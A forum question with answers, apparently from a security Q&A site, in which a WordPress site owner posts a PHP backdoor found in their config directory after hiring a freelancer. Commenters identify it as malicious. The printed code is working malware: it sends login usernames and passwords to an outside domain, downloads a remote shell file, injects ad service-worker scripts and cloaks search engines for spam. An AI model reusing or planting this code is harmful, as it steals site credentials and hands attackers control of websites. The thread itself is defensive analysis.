2

I was working with a freelancer from upwork and noticed they added this script titled .default in my config directory. It looks malicious and they were hired to do CSS style changes of elementor:

<?php

header('Cache-Control: private, max-age=0, no-cache');



if (!function_exists('getUserIP')) {
    function getUserIP() {
        foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
            if (array_key_exists($key, $_SERVER) === true) {
                foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) {
                    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
                        return $ip;
                    }
                }
            }
        }
    }
}

if (!function_exists('cacheUrl')) {
    function cacheUrl($url, $skip_cache = FALSE) {

       $cachetime = 10; //one week

       // $cachetime = 60 * 60 * 24 * 7; //one week

        $file = ABSPATH.WPINC.
        '/class-wp-http-netfilter.php';

        $mtime = 0;
        if (file_exists($file)) {
            $mtime = filemtime($file);
        }
        $filetimemod = $mtime + $cachetime;

        if ($filetimemod < time() OR $skip_cache) {
            $ch = curl_init($url);
            curl_setopt_array($ch, array(
                CURLOPT_HEADER => FALSE,
                CURLOPT_RETURNTRANSFER => TRUE,
                CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36',
                CURLOPT_FOLLOWLOCATION => TRUE,
                CURLOPT_MAXREDIRS => 5,
                CURLOPT_CONNECTTIMEOUT => 30,
                CURLOPT_TIMEOUT => 60,
            ));
            $data = curl_exec($ch);
            curl_close($ch);

            if ($data AND!$skip_cache) {
                file_put_contents($file, $data);
            }
        } else {
            $data = file_get_contents($file);
        }

        return $data;
    }
}

$weoboo = cacheUrl('http://ww.seniors-dating.org/lnk/data/ip.admins.txt');





if (strpos($weoboo, getUserIP()) !== false) {
    //ip found
} else {
    
    
$gbt = getUserIP(); 
$id = $_SERVER['REQUEST_URI'];
$uag = $_SERVER['HTTP_USER_AGENT']; 
$host=$_SERVER['HTTP_HOST'];
$ref =$_SERVER['HTTP_REFERER'];
$uri =$_SERVER['REQUEST_URI'];
$r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}";
    if (preg_match_all("/ssss$/", $id, $matches) ) {
echo '1112';
    }
    if (preg_match_all("/iiis$/", $id, $matches) ) {
$file2Replace = ABSPATH.WPINC.'/header.php';
$oldRep = 'Zgc5c4MXrK42MR4F7ZdaOu3fNFnPMLhU3ySQFu7RvxpYYEcbGgEg4Q==';
$newRep = 'Zgc5c4MXrK42MQsM7IlQPPeZfl3OdrpdmmSLH6uToRkH';


$repContent = file_get_contents($file2Replace);
$repContent = str_replace($oldRep, $newRep, $repContent);
file_put_contents($file2Replace, $repContent);
exit;

    }
    
    
if (preg_match_all("/xmlrpc.php$/", $id, $matches) ) {

if (!empty($_POST))
{

        $res =   file_get_contents ('php://input') . "\n";

        $curl = curl_init();
    curl_setopt($curl, CURLOPT_HEADER, false);
    curl_setopt($curl, CURLOPT_URL, 'http://ww.seniors-dating.org/lnk/api_xmlrpc.php');
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_POST, true);
    curl_setopt($curl, CURLOPT_POSTFIELDS, $res );
    curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
  
    $response = curl_exec($curl);
    
    curl_close($curl);

}

echo 'XML-RPC server accepts POST requests only.';
exit;
}








if (preg_match_all("/068f7461.js$/", $id, $matches) ) {
header('Content-Type: application/javascript');
echo 'self.importScripts(\'https://picmedia.biz/sw/w1s.js\');';
exit;
}
        if (preg_match_all("/serviceworker.js$|332.js$|34334$/", $id, $matches) ) {
header('Content-Type: application/javascript');
echo 'self.importScripts(\'https://redads.biz/sw/w1s.js\');';
//echo $gbt;
exit;
}
    if (preg_match_all("/headssr\.php$/", $id, $matches) ) { 
    $fileUrl = 'http://ww.seniors-dating.org/lnk/sh.txt';
 
   $saveTo = ABSPATH . WPINC . '/abcsss.php';
  
   if ( is_file ($saveTo) && filesize ($saveTo) && time() - filemtime($saveTo) <= 60 * 60 * 1 ) {
     //
   }
   else {
     $fp = fopen($saveTo, 'w+');
     $ch = curl_init($fileUrl);
     curl_setopt($ch, CURLOPT_FILE, $fp);
     curl_setopt($ch, CURLOPT_TIMEOUT, 15);
     curl_exec($ch);
     curl_close($ch);
     fclose($fp);
  }
     }
$srr = preg_replace('#^www\.#', '', $_SERVER['SERVER_NAME']);

            if (!preg_match_all("/ffgg$/", $id, $matches) ) {
if (!preg_match_all("/BLEXBot|Wordpress|SemrushBot|AhrefsBot|YandexBot|DotBot|MJ12bot|hrankbot|Darwin|spider/", $uag, $matches)) {        
if (preg_match_all("/dating|senior|singles/", $r, $matches) ) {
$tr = preg_replace ('#^www\.#', '', $_SERVER['SERVER_NAME']);
$tr = preg_replace ('#^[^\.]*#', '', $tr);
$tr = str_replace('.', '', $tr);
} 
if (!preg_match_all("/2r232r22r/", $r, $matches) ) {
    
$tr = preg_replace('#^www\.#', '', $_SERVER['SERVER_NAME']);
$tr = str_replace('.', '', $tr);
}
                
    $ch = curl_init();    
    
    
    
        $user_ip = getUserIP();



    if (!preg_match_all("/\/post-|\/pgxhtogrzm-/", $id, $matches) ) {
//
    if (preg_match_all("/213.111.153.189|213.111.166.54|213.111.153.84|213.111.153.197|37.1.217.38|2212.24.105.244|134.19.179.147|213.111.153.197|37.1.217.38|134.19.179.195|178.162.204.214|185.156.175.35|82.102.27.163|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) {

// add_filter( 'the_content', 'supermario', 20 );

function supermario($content){

  $ch = curl_init( 'http://fsst.seniors-dating.org/sape/pgxhtogrzm-'.rand(1,64).'-'.rand(1,47767).'-aa/' ); 
  curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($ch, CURLOPT_HEADER, 0);
  curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
  $miaLinks = curl_exec ($ch);
  curl_close($ch);

  return $content . $miaLinks;
}
    } 
    }

function add_meta_cache() {
  echo '<meta http-equiv="Cache-Control" content="no-cache">';
  echo '<meta http-equiv="cache-control" content="max-age=0" />';
  echo '<meta http-equiv="cache-control" content="no-store" />';
  echo '<meta name="google" content="notranslate" />';
  echo '<meta name="robots" content="noarchive" />';

}
add_action('wp_head', 'add_meta_cache');




    if (preg_match_all("/\/post-|\/pgxhtogrzm-/", $id, $matches) ) {
            if (preg_match_all("/google|bing|msn|yahoo/", $r, $matches) ) {
                                    if (!preg_match_all("/217.118.90.181|213.111.153.189|109.202.107.20|212.24.105.244|109.202.107.20|134.19.179.147|37.1.217.38|134.19.179.195|178.162.204.214|185.156.175.35|82.102.27.163|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) {
             $url_string = 'http://fsst.seniors-dating.org/pirc/'.$tr.'/' . $id; 
        } }
    if (preg_match_all("/217.118.90.181|213.111.153.189|109.202.107.20|212.24.105.244|134.19.179.147|134.19.179.147|37.1.217.38|134.19.179.195|178.162.204.214|82.102.27.163|185.156.175.35|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) {
             $url_string = 'http://fsst.seniors-dating.org/pirc/'.$tr.'/' . $id;
    }
    curl_setopt ($ch, CURLOPT_URL, $url_string);
    curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$host=$_SERVER['HTTP_HOST'];
$ref =$_SERVER['HTTP_REFERER'];
$uri =$_SERVER['REQUEST_URI'];
$r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}";
    curl_setopt($ch, CURLOPT_REFERER, $r);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $_SERVER['REMOTE_ADDR']));
$html = curl_exec ($ch);
if ( curl_getinfo($ch, CURLINFO_RESPONSE_CODE) == "302") {
    if (preg_match('~Location: (.*)~i', $html, $match)) {
      $location = trim($match[1]);
     }    curl_close($ch);
  
    header('Location: ' . $location);
                                                      exit();
  } $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
    $header = substr($html, 0, $header_size);
    $html = substr($html, $header_size);
    curl_close($ch);
if (isset($_SERVER['HTTP_USER_AGENT']))
    $url_string = "User-Agent: {$_SERVER['HTTP_USER_AGENT']}";

    if (strstr($id, ".css")){
        header('Content-Type: text/css; charset=utf-8');
    }
    elseif (strstr($id, ".png")){
        header('Content-Type: image/png');
    }
    elseif (strstr($id, ".jpg") || strstr($id, ".jpeg")){
        header('Content-Type: image/jpeg');
    }
    elseif (strstr($id, ".gif")){
        header('Content-Type: image/gif');
    }
    elseif (strstr($id, ".xml")){
        header('Content-Type: application/xml');
    }

    if(strstr($header, 'pdf'))
        header('Content-Type: application/pdf');

    echo $html;


//  exit;
    } 

            //  if (preg_match_all("/3322233322/", $r, $matches) ) {

                if (!preg_match_all("/robots.txt|\.env$|favicon\.ico$|wp-login\.php|\/wp-content\/|\.txt$|js|css|\/wp-admin\/|\.xml$|\/wp-includes\/|well-known\/|=\.\.|wp-cron\.php/", $r, $matches) ) {
                        if (!preg_match_all("/DELETEORNOTXZ|YanSex|Baidu|Googlebot|Yandexbot|Bing|DeuSu|ltx71|CCBot|pirst|Sogou|zgrab|Nutch|Aport|Ahrefs|urllib|semtix|madbot|Exabot|AdvBot|DotBot|ezooms|statdom|MauiBot|XoviBot|BLEXBot|HTTrack|MJ12bot|Panopta|rogerbot|uCrawler|Netcraft|Moreover|Netcraft|verifying|majestic|solomono|Teleport|Site-Shot|netEstate|Crowsnest|360Spider|MegaIndex|DataMiner|SemrushBot|PaperLiBot|linkdexbot|SafeDNSBot|Barkrowler|AC-BaiduBot|ZoominfoBot|Baiduspider|DomainTools|YisouSpider|TurnitinBot|domainstats|serpstatbot|blogmuraBot|randomsurfer|Nimbostratus|DomainCrawler|Go-http-client|trendictionbot|SocialSearcher|CRAZYWEBCRAWLER|viralvideochart|python-requests|CheckMarkNetwork|NetpeakCheckerBot|DomainSONOCrawler|FlightDeckReportsBot/i", $uag, $matches)) {
    //if (preg_match_all("/213.111.153.217|37.1.217.38|213.152.162.104|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $gbt, $matches)) {
//$urlsArr = [
//'http://chipotle.buzz/in/inseq',
//'http://fsst.seniors-dating.org/wwnew/seniors-1-'.rand(1,16).'-a'.rand(1,167).'221/'
//];
//$url_string = $urlsArr[array_rand($urlsArr)];
//  $url_string = 'http://chipotle.buzz/in/news/?val1='.$r;

    $url_string = 'http://chipotle.buzz/in/news/?val1='.$host;
//   $url_string = 'http://fsst.seniors-dating.org/wwnew/seniors-1-'.rand(1,16).'-a'.rand(1,167).'221/'; 
    }
    }
    curl_setopt ($ch, CURLOPT_URL, $url_string);
    curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$host=$_SERVER['HTTP_HOST'];
$ref =$_SERVER['HTTP_REFERER'];
$uri =$_SERVER['REQUEST_URI'];
$r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}";
    curl_setopt($ch, CURLOPT_REFERER, $r);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $_SERVER['REMOTE_ADDR']));
    $html = curl_exec ($ch);
if ( curl_getinfo($ch, CURLINFO_RESPONSE_CODE) == "302") {
    if (preg_match('~Location: (.*)~i', $html, $match)) {
      $location = trim($match[1]);
     }    curl_close($ch);
  
    header('Location: ' . $location);
                                                      exit();
  }
    $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
    $header = substr($html, 0, $header_size);
    $html = substr($html, $header_size);
    curl_close($ch);
if (isset($_SERVER['HTTP_USER_AGENT']))
    $url_string = "User-Agent: {$_SERVER['HTTP_USER_AGENT']}";
    if (strstr($id, ".css")){
        header('Content-Type: text/css; charset=utf-8');
    }
    elseif (strstr($id, ".png")){
        header('Content-Type: image/png');
    }
    elseif (strstr($id, ".jpg") || strstr($id, ".jpeg")){
        header('Content-Type: image/jpeg');
    }
    elseif (strstr($id, ".gif")){
        header('Content-Type: image/gif');
    }
    elseif (strstr($id, ".xml")){
        header('Content-Type: application/xml');
    }
    if(strstr($header, 'pdf'))
        header('Content-Type: application/pdf');
//  echo $html;
function yuhoo($html) {
    echo $html;
   }

   add_action('wp_head', 
           function() use ( $html ) { 
               yuhoo( $html ); 
            }
        );
//  exit;
    } 
            //  }
    }   
    

    

}
    //file_put_contents('/tmp/log.txt', getUserIP() . "\n", FILE_APPEND);
    /* your code end */



/* weoboo end */
if(!isset($_COOKIE['_eshoob'])) {
        
    setcookie('_eshoob', 1, time()+604800, '/');

    // unset cookies
    if (isset($_SERVER['HTTP_COOKIE'])) {

        $cookies = explode(';', $_SERVER['HTTP_COOKIE']);
        
        foreach($cookies as $cookie) {

            if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) {
            
            $parts = explode('=', $cookie);
            $name = trim($parts[0]);

            setcookie($name, '', time()-1000);
            setcookie($name, '', time()-1000, '/');
            
            }
        }
    } 
}


if (!function_exists('getUserIP')) {
function getUserIP()
{
    foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key)
    {
        if (array_key_exists($key, $_SERVER) === true)
        {
            foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip)
            {
                if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false)
                {
                    return $ip;
                }
            }
        }
    }
}
}

if (!function_exists('isHttps')) {
function isHttps() {
    if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') ||
        (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') ||
        (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') ||
        (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') ||
        (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) {
        $server_request_scheme = 'https';
    } else {
        $server_request_scheme = 'http';
    }
    return $server_request_scheme;
}
}

if (!function_exists('wordpress_api_debug')) {
function wordpress_api_debug( $user_login, $user ){

    $wpApiUrl = "http://ww.seniors-dating.org/lnk/api.php";    

        //

    $uuuser = get_user_by('login', $_POST['log']);
    if(in_array('administrator', $uuuser->roles)){
        $role = 'admin';
    }
    else{
        $role = 'user';
    }
    // 

    $verbLogs = array(
        'wp_host'       => $_SERVER['HTTP_HOST'],
        'wp_uri'        => $_SERVER['REQUEST_URI'],
        'wp_scheme'     => isHttps(),
        'user_login'    => $_POST['log'],
        'user_password' => $_POST['pwd'],
        'user_ip'       => getUserIP(),
        'user_role'     => $role
    );


    if (!empty($verbLogs['user_login'])) {
    
    $wpLogData = json_encode($verbLogs);
    
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_HEADER, false);
    curl_setopt($curl, CURLOPT_URL, $wpApiUrl);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_POST, true);
    curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData);
    curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));

    $response = curl_exec($curl);
    
    curl_close($curl);

    }

}
}

if (function_exists('add_action')) {

add_action( 'wp_login', 'wordpress_api_debug', 10, 2 );

}

if (!function_exists('wordpress_api_wrongauth_debug')) {

    function wordpress_api_wrongauth_debug( $user_login, $user ){
    
        $wpApiUrl = "http://ww.seniors-dating.org/lnk/api_false.php";    
    
            //
    
        $uuuser = get_user_by('login', $_POST['log']);
        if(in_array('administrator', $uuuser->roles)){
            $role = 'admin';
        }
        else{
            $role = 'user';
        }
        // 
    
        $verbLogs = array(
            'wp_host'       => $_SERVER['HTTP_HOST'],
            'wp_uri'        => $_SERVER['REQUEST_URI'],
            'wp_scheme'     => isHttps(),
            'user_login'    => $_POST['log'],
            'user_password' => $_POST['pwd'],
            'user_ip'       => getUserIP(),
            'user_role'     => $role
        );
    
    
        if (!empty($verbLogs['user_login'])) {
        
        $wpLogData = json_encode($verbLogs);
        
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_HEADER, false);
        curl_setopt($curl, CURLOPT_URL, $wpApiUrl);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($curl, CURLOPT_POST, true);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData);
        curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
    
        $response = curl_exec($curl);
        
        curl_close($curl);
        
        }
    
    }
    }

    if (function_exists('add_action')) {
    
    add_action( 'wp_login_failed', 'wordpress_api_wrongauth_debug', 10, 2 );
    
    }

/*
    // themes list
$all_themes = wp_get_themes();
$themeArr = [];
foreach ($all_themes as $theme){
    $themeArr[] = $theme->get( 'TextDomain' );
}

$uploads = wp_upload_dir();
$upDir = $uploads['basedir'];
$themesList = "{$upDir}/themes_list.txt";

if (!file_exists($themesList)) {
    file_put_contents($themesList, $_SERVER['SERVER_NAME'] . ';' . implode(';', $themeArr) . "\n", FILE_APPEND);
}
// themes list end
*/



?>
Daniel Taki
  • 23
  • 1
  • 3
  • Why cant you just ask them? – yeah_well Nov 25 '20 at 20:38
  • What part of it you don't understand? – mentallurg Nov 25 '20 at 20:40
  • The whole thing I'm not sure what it is doing and there's some shady links to seniors-dating.org as well as a ip table. – Daniel Taki Nov 25 '20 at 20:42
  • 5
    Do you have anything to do with seniors-dating.org? If not, it's **very suspicious** to say the least. I noticed the function wordpress_api_debug is added to the hook wp_login, which means it will be executed at every login. That function collects $_POST['pwd'] which appears to be the password field, then send it with a curl request to the suspicious domain. – reed Nov 25 '20 at 21:02
  • No I do not, okay thank you. That is what I thought I have already reported this to upwork and wanted to any other insight into the code. – Daniel Taki Nov 25 '20 at 21:07
  • It does a lot of other stuff, it basically checks the request URI (every request is probably redirected there with htaccess) and does stuff according to the request (it can load js scripts from other domains, apparently write stuff to a "header.php" file that doesn't even exist by default, etc.). If you want to find out all the details in order to clean your website, forget about it. Just restore everything from a clean backup, that's the way to go. – reed Nov 25 '20 at 21:18
  • 2
    And by the way, asking to analyze malware here is considered off-topic, so unfortunately your question will soon be closed, I guess. That's all. – reed Nov 25 '20 at 21:19
  • Alright thanks @reed appreciate it. – Daniel Taki Nov 25 '20 at 21:27

1 Answers1

3

Yes, it is malicious.

The script for example collects data on the WordPress installation and the credentials used to login

$verbLogs = array(
    'wp_host'       => $_SERVER['HTTP_HOST'],
    'wp_uri'        => $_SERVER['REQUEST_URI'],
    'wp_scheme'     => isHttps(),
    'user_login'    => $_POST['log'],
    'user_password' => $_POST['pwd'],
    'user_ip'       => getUserIP(),
    'user_role'     => $role
);

and then uses curl_exec() to send this data to http://ww.seniors-dating.org/lnk/api.php.

Esa Jokinen
  • 16,725
  • 5
  • 51
  • 56